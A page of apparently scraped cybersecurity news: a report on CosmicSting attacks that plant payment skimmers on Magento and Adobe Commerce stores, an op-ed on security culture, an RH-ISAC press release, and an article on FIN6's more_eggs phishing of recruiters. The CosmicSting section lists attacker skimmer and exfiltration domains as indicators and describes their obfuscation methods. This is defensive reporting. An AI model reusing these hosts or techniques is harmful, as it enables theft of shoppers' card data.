Subsequent attacks observed in August 2024 have chained CosmicSting with CNEXT (CVE-2024-2961), a vulnerability in the iconv library within the GNU C library (aka glibc), to achieve remote code execution.

"CosmicSting (CVE-2024-34102) allows arbitrary file reading on unpatched systems. When combined with CNEXT (CVE-2024-2961), threat actors can escalate to remote code execution, taking over the entire system," Sansec noted.

The end goal of the compromises is to establish persistent, covert access on the host via GSocket and insert rogue scripts that allow for the execution of arbitrary JavaScript received from the attacker in order to steal payment data entered by users on the sites.

The latest findings show that several companies, including Ray Ban, National Geographic, Cisco, Whirlpool, and Segway, have fallen victim to CosmicSting attacks, with at least seven distinct groups partaking in the exploitation efforts -

*   **Group Bobry**, which uses whitespace encoding to hide code that executes a payment skimmer hosted on a remote server
*   **Group Polyovki**, which uses an injection from cdnstatics.net/lib.js
*   **Group Surki**, which uses XOR encoding to conceal JavaScript code
*   **Group Burunduki**, which accesses a dynamic skimmer code from a WebSocket at wss://jgueurystatic\[.\]xyz:8101
*   **Group Ondatry**, which uses custom JavaScript loader malware to inject bogus payment forms that mimic the legitimate ones used by the merchant sites
*   **Group Khomyaki**, which exfiltrates payment information to domains that include a 2-character URI ("rextension\[.\]net/za/")
*   **Group Belki**, which uses CosmicSting with CNEXT to plant backdoors and skimmer malware

"Merchants are strongly advised to upgrade to the latest version of Magento or Adobe Commerce," Sansec said. "They should also rotate secret encryption keys, and ensure that old keys are invalidated."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

Prioritizing security as a critical element to an organization’s effectiveness and success will reduce the risk of incidents, while benefiting the whole team and the organization’s reputation.

Source: Xavierlorenzo via Alamy Stock Photo

October is National Cybersecurity Awareness Month in the U.S. when IT teams prep their annual security education and awareness training program. For many employees, this may be their only interaction with the security team outside of onboarding, submitting a help ticket, or a potential incident. But every person plays a part in the security function of the business every day, whether they realize it or not. As they do, they have the potential to be an asset or risk to the team’s security posture.

According to the 2024 Verizon Data Breach Investigations Report (DBIR), 68% of all breaches include the human element, with people being involved either via error, use of stolen credentials or social engineering. While exploiting technical vulnerabilities is rising in frequency as the initial way-in for an attacker, stolen credentials and phishing still account for the lion’s share of recorded breaches.

Prioritizing security as a critical element to an organization’s effectiveness and success will reduce the risk of incidents, while benefiting the whole team and the organization’s reputation.

**Putting a Price on Trust**

Security is a core business function, as crucial to an organization's success as finance, revenue generation or product departments. It's also a key factor in shaping an organization's reputation, specifically influencing public and internal perceptions of whether the organization is trusted and reliable. To understand the profound impact of perceived security (or insecurity) on both public image and the bottom line, one need only examine customer reviews or stock prices of major businesses before and after a publicized breach or outage.

Security has a particularly significant impact on whether the company is seen as reliable and safe for business. The difference between a successful security program and a vulnerable one comes down to whether that value is communicated regularly and effectively.

**What's Measured Matters**

In some organizations, a CISO or CIO can advocate for security at the executive level, informing other leaders and stakeholders of its needs and value. In most businesses, however, this responsibility falls to the IT team leader, adding to their already substantial workload.

While it may seem like self-promotion or extraneous work, it’s extremely valuable to take the extra time to summarize threats stopped, processes improved, projects completed and team members modeling strong security behavior. This effort ensures that the benefits and value of the security program remain a priority for leadership, rather than being overshadowed by the next quarter's budget concerns or the hope of avoiding bad news.

Before starting from scratch, find existing resources by asking vendors and partners what performance reports and metrics they can provide. Many tools should already have audit or other templated reporting functions, and some may even offer custom summaries or executive briefings designed to update leaders on progress.

When choosing metrics, ask whether they truly advance effective security goals. As one example, a common phishing training misstep is solely tracking the number of people who click the link before and after training. While reducing risky clicks is valuable, reducing that number to zero is unlikely. Instead, focusing on how quickly someone reports a phish can materially reduce the time it takes to detect and stop a real-world attack. Now, training can emphasize the importance of reporting suspicious activity, even if an employee initially fell for the phish. This approach encourages openness rather than silence born from fear or embarrassment, and rewarding proactive behavior can significantly increase the likelihood of team members reaching out when something’s up.

Remember, what gets measured gets managed. Carefully selecting and tracking meaningful security metrics improves security posture and demonstrates the tangible value of a security program to the organization. This data-driven approach can help secure necessary resources and support for ongoing security initiatives, turning the security function from a cost center into a value driver for the business.

**Shedding the "Department of No" Reputation**

There’s an oft-repeated cliche of security as The Department of No: a roadblock to productivity, best unseen and unheard. And if most security interactions are perceived as “tedious and/or confusing” or “frustrating and/or terrifying,” people will go out of their way to avoid future interactions.

In reality, security works tirelessly to keep the organization and people within it safe and protected from innumerable risks. What may feel like an arbitrary refusal from a teammate’s perspective may very well be backed by good policy.

Improving this perception doesn't mean abandoning controls or approving every request. Instead, it requires clearly explaining why policies are in place, regularly collecting feedback on processes that prove to be roadblocks and showcasing wins as part of the normal business cadence.

Errors can be more than additional help tickets for IT teams to triage or irregularities to investigate: they can provide invaluable feedback where a process is unintuitive or misunderstood. Talking through “why” someone wanders off the authorized path can help identify confusing documentation, unconsidered use cases or other qualitative feedback that slips through what can be captured in a system log.

**What Have You Done For Them Lately?**

Most people don't have security experts on call in their personal life, and this gives security teams a unique opportunity to help, while building on their relationship with the team at large. Instead of just rolling out click-through training modules to meet insurance and compliance requirements, treat education like another opportunity to provide an employee benefit.

Inform employees about trending attacks and scams, so they can be aware and inform potentially vulnerable family members. Teach them about good security hygiene, not only on work systems but also on sites they’re likely to use in their daily life like social media or personal banking. Not only does this practice help keep your team safe from threats when they aren't at work, it also feeds back into organizational security by making them harder targets for attackers. It would be great if attackers took off nights and weekends, but in reality, we know they’ll go after access wherever (and through whomever) it’s available.

Sharing a few tips every week during team meetings, on team chat and at all-hands updates is also more digestible for people. It’s easier to absorb a few tips each week than resist the urge to tune out a dry, monotone hours-long training session.

This approach also improves retention. According to Hermann Ebbinghaus's research on memory and the “forgetting curve”, we forget the vast majority of newly learned information within a couple of days of learning it. However, the second iteration of reviewing that same information will increase both the percentage of information recalled, and how long it will be remembered. Regular refreshers and expansions on a topic will result in a more complete understanding and a resilient recall of the topic.

**Stronger Together**

Shifting the relationship of security from one of avoidance to one of reinforcement, safety and reliable guidance will motivate people to listen more carefully to security messaging. Greater understanding and buy-in cultivate a stronger security mindset across teams, defining security as a shared, proactive function rather than a specialized, reactive one.

Security is a collective effort, and helping your team stay safer inside and outside of work will benefit both them and the organization. By redefining security as a trusted ally rather than a dreaded email or meeting invite, we can create a more resilient and secure environment for all. Remember, when it comes to security, we are indeed stronger together!

**About the Author**

Security Strategist, Blumira

Zoe Lindsey is a security strategist at Blumira with over a decade of experience in information security. She began her infosec career at Duo Security in 2012 with a background in medical and cellular technology. Throughout her career, Zoe has advised organizations of all sizes on strong security tactics and strategies. As a sought-after speaker, she has shared best practices and recommendations at industry-leading events including RSA Conference, SecureWorld, and Cisco Live.

Normalizing Security Culture: Don’t Have to Get Ready If You Stay Ready

PRESS RELEASE

VIENNA, Va., Oct. 1, 2024 /PRNewswire/ -- The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) today announced that Pam Lindemoen will join the organization as Chief Security Officer & VP of Strategy. In this role, she will oversee the organization's security operations, including cybersecurity and information security, while also leading strategic planning and partner engagement. With nearly 30 years of experience, Lindemoen brings a wealth of knowledge in information security, application development, and infrastructure to the organization.

"We're thrilled to welcome Pam Lindemoen to the RH-ISAC team," said Suzie Squier, president of RH-ISAC. "Her extensive experience in navigating complex regulatory environments and fostering robust security postures will be invaluable to our members. Pam's strategic vision and proven track record in developing comprehensive cybersecurity programs align perfectly with our mission to enhance the security of consumer-facing industries through collaboration."

Lindemoen's expertise spans various industries, including healthcare, technology, financial services, and manufacturing. Most recently, she served as CISO Advisor at Cisco. In this role, among other duties, she was instrumental in facilitating the CISO Leadership Development Program that RH-ISAC provided to develop talent in the industry. Lindemoen also serves on the advisory board for Cyber Florida: The Florida Center for Cybersecurity.

Lindemoen's appointment comes at a critical time for the retail and hospitality industries, which face increasing cybersecurity threats and complex regulatory requirements. Her multifaceted expertise in information security, application development, and infrastructure positions her uniquely to address the diverse challenges faced by RH-ISAC members. As CSO, Lindemoen will play a key role in shaping the organization's strategic initiatives and supporting members in their cybersecurity efforts.

Learn more about RH-ISAC and memberships at rhisac.org.

ABOUT RH-ISAC  
The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) is a trusted community for sharing sector-specific cybersecurity information and intelligence. RH-ISAC connects information security teams at the strategic, operational, and tactical levels to work together on issues and challenges, to share practices and insights, and to benchmark among each other – all with the goal of building better security for consumer-facing industries through collaboration. RH-ISAC serves businesses including retailers, restaurants, hotels, gaming casinos, food retailers, consumer products, and other consumer-facing companies. For more information, visit www.rhisac.org.

You May Also Like

Retail &amp; Hospitality ISAC Announces Pam Lindemoen As New CSO and VP

The FIN6 group is the likely culprit behind a spear-phishing campaign that demonstrates a shift in tactics, from targeting job seekers to going after those who hire.

Source: Kay Roxby via Alamy Stock Photo

A long-active threat group known for targeting multinational financial organizations has been impersonating job seekers in order to target talent recruiters. The method is a spear-phishing campaign spreading the "more\_eggs" backdoor, which is capable of executing secondary malware payloads.

Researchers from Trend Micro discovered campaign distributing the JScript backdoor, which is part of a malware-as-a-service (MaaS) toolkit called Golden Chickens, they revealed in analysis published this week published this week. They believe that the campaign is likely the work of FIN6, which is known for using the backdoor to target their victims. However, Trend Micro emphasized that the nature of the malware being a part of an MaaS package "blurs the lines between different threat actors" and thus makes precise attribution difficult.

FIN6 has been known in the past to pose as recruitment officers to target job seekers, but it appears to be "moving from posing as fake recruiters to now masquerading as fake job applicants" in a shift in tactics, Trend Micro researchers wrote in a blog post about the attacks.

Trend Micro identified the campaign when an employee who works as a talent search lead at a customer in the engineering sector downloaded a fake resume from a purported job applicant for a sales engineer position. The downloaded file executed a malicious .lnk file that resulted in a more\_eggs infection.

Related:Dark Reading Confidential: Meet the Ransomware Negotiators

"A spear-phishing email was initially sent from allegedly from 'John Cboins' using a Gmail address to a senior executive at the company," the researchers wrote. That email contained no attachments or URLs but instead was a social engineering ploy demonstrating "that the threat actor was attempting to gain the user's confidence," they wrote.

Soon after that communication, a recruitment officer downloaded what was supposed to be a resume, John Cboins.zip, from a URL using Google Chrome, though "it was not determined where this user obtained the URL," the researchers noted.

Further investigation of the URL revealed what appeared to be a typical website of a job applicant that even utilizes a CAPTCHA test and would not likely raise suspicions, thus capable of easily deceiving an unsuspecting recruiter into thinking he or she was corresponding with a legitimate candidate, they said.

**Same Payload, Different Nesting Methods**

Various security researchers have observed more\_eggs being used in attacks as early as 2017 against a variety of targets, including Russian financial institutions and mining firms, and other multinational organizations. As mentioned, more\_eggs is part of the Golden Chickens toolkit, which is distributed by Venom Spider, an underground MaaS provider also known as badbullzvenom, according to Trend Micro.

Related:Zimbra RCE Vuln Under Attack Needs Immediate Patching

While the backdoor is historically a common denominator among different threat campaigns by Venom Spider, the methods used for distributing the malware vary. Some attacks involved phishing schemes with malicious documents that contained JavaScript and PowerShell scripts, while others used LinkedIn and email to lure employees with fake job offers, leading them to malicious domains that host malicious .zip files, the researchers noted.

Attackers also have used phishing emails to distribute .zip files disguised as images to initiate a more\_eggs infection, while a June campaign again leveraged LinkedIn to trick recruiters into accessing a fake job resume site that distributed the malware as a malicious .lnk file.

There appear to be two active campaigns currently spreading the malware that target victims who "are in roles that attackers could leverage to identify valuable assets and have higher potential for financial gain," the researchers wrote.

**Prevent Hatching of "More\_Eggs"**

Traditional anti-malware solutions should immediately detect and eliminate an infection by more\_eggs on a corporate network. However, factors such as an organization’s operational needs, human fallibility, and potential misconfigurations can pose a risk of the malware slipping past these detections, according to Trend Micro.

Related:Retail & Hospitality ISAC Announces Pam Lindemoen As New CSO and VP

"The advanced social engineering techniques employed — such as using a convincing website and a malicious file disguised as a resume to start the infection — underscore the critical need for organizations to maintain continuous vigilance," the researchers wrote. "It is imperative that defenders implement robust threat detection measures and foster a culture of cybersecurity awareness to effectively combat these evolving threats."

Trend Micro shared various indicators of compromise (IoCs) related to the campaigns in the post. Organizations with managed detection and response (MDR) systems in place can use them to set up custom filters and models tailored to detect a specific threat like more\_eggs that then can be fed to a security playbook to automate response to an alert, according to the post.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Tag

#cisco